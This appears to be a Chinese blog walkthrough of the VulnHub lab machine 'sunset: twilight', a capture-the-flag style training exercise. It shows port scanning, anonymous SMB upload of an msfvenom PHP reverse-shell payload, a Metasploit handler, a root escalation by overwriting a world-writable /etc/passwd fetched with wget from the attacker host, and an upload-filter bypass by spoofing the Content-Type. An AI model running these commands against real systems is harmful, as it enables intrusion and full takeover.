PJzhang:vulnhub靶機sunset系列SUNSET:TWILIGHT

PJzhang發表於2020-09-17

貓寧~~~

地址：https://www.vulnhub.com/entry/sunset-twilight,512/

關注工具和思路。

nmap 192.168.43.0/24
靶機IP
192.168.43.164

nmap -A -p1-65535 192.168.43.164

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.92
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open microsoft-ds netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp open ccproxy-ftp pyftpdlib 1.5.6
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
8080/tcp open http-proxy PHP cli server 5.5 or later
63525/tcp open http PHP cli server 5.5 or later

enum4linux 192.168.43.164
WRKSHARE Disk Workplace Share. Do not access if not an employee.

smbclient //192.168.43.164/WRKSHARE，無密碼登入
smb: \>
cd \var\www\html
smb: \var\www\html\>

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php

smb下上傳muma.php
smb: \var\www\html\> put muma.php

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run

訪問http://192.168.43.164/muma.php，反彈shell

shell
python -c "import pty;pty.spawn('/bin/bash')"
www-data@twilight:/var/www/html$

cd /home
顯示存在miguel的使用者
cat /etc/passwd
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash

ls -al /etc/passwd，有讀寫許可權
-rwxrwxrwx 1 root root 1594 Jul 16 09:34 /etc/passwd

攻擊機執行
openssl passwd -1 -salt useruser 123456

將靶機/etc/passwd複製到本地
最後一行新增
useruser:$1$useruser$8MVi1CAiLopcN8yk6Hj4B0:0:0:/root/root:/bin/bash

python3 -m http.server 80

wget http://192.168.43.154/passwd -O /etc/passwd

su useruser
id
uid=0(root) gid=0(root) groups=0(root)

利用上傳介面獲取shell

dirb http://192.168.43.3/

http://192.168.43.3/gallery/

http://192.168.43.3/gallery/original/，可以檢視檔案目錄，例如上傳的muma.php

重新命名muma.php為muma.php.pjpeg

上傳，burpsuite抓包，
Content-Type: image/jpeg
檔名重新修改為muma.php

上傳成功

http://192.168.43.3/gallery/original/muma.php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run

成功獲取shell

靶機練習：sunset: midnight
2024-06-05
Vulnhub靶機系列之Acid
2022-01-30
【vulnhub】靶機-【DC系列】DC9（附靶機）
2021-01-29
vulnhub靶機：djinn2
2024-03-20
vulnhub靶機：djinn3
2024-03-25
vulnhub靶機：dc-8
2024-03-15
Vulnhub實戰-rtemis靶機?
2022-01-04
Vulnhub實戰-doubletrouble靶機?
2021-10-11
Vulnhub實戰-FALL靶機?
2021-10-22
Vulnhub靶場 | DC系列 | DC-9
2024-07-13
Vulnhub靶場 | DC系列 | DC-8
2024-07-13
VulnHub PowerGrid 1.0.1靶機滲透
2020-06-25
Vulnhub-Earth靶機筆記
2024-11-29
筆記
vulnhub靶機-Me and My Girlfriend: 1
2021-09-30
VulnHub CengBox2靶機滲透
2020-06-24
Vulnhub實戰-DockHole_1靶機?
2021-10-15
Vulnhub實戰-grotesque3靶機?
2021-10-21
Vulnhub實戰-Dockhole_2靶機?
2021-10-18
Vulnhub實戰-JIS-CTF_VulnUpload靶機?
2021-10-09
vulnhub--JIS靶場
2024-05-19
vulnhub-DC:8靶機滲透記錄
2021-08-13
vulnhub-DC:6靶機滲透記錄
2021-08-04
vulnhub-DC:7靶機滲透記錄
2021-08-05
vulnhub-DC:5靶機滲透記錄
2021-08-03
vulnhub-DC:2靶機滲透記錄
2021-07-28
vulnhub-DC:3靶機滲透記錄
2021-07-29
vulnhub靶場之ADROIT: 1.0.1
2023-04-23
VulnHub靶場之Relevant: 1
2020-10-03
【Vulnhub靶場】DRIPPING BLUES: 1
2022-01-25
vulnhub靶場之MOMENTUM: 1
2023-03-13
vulnhub靶場之PYLINGTON: 1
2023-03-14
vulnhub靶場之GROTESQUE: 3.0.1
2022-12-24
vulnhub靶場之HACKABLE: III
2022-12-26
vulnhub靶場之HACKSUDO: SEARCH
2023-03-14
vulnhub靶場之BUFFEMR: 1.0.1
2023-01-10
vulnhub靶場之VULNCMS: 1
2023-01-15
vulnhub靶場之WIRELESS: 1
2023-03-27
vulnhub靶場之CROSSROADS: 1
2023-04-14
ROS

PJzhang:vulnhub靶機sunset系列SUNSET:TWILIGHT

相關文章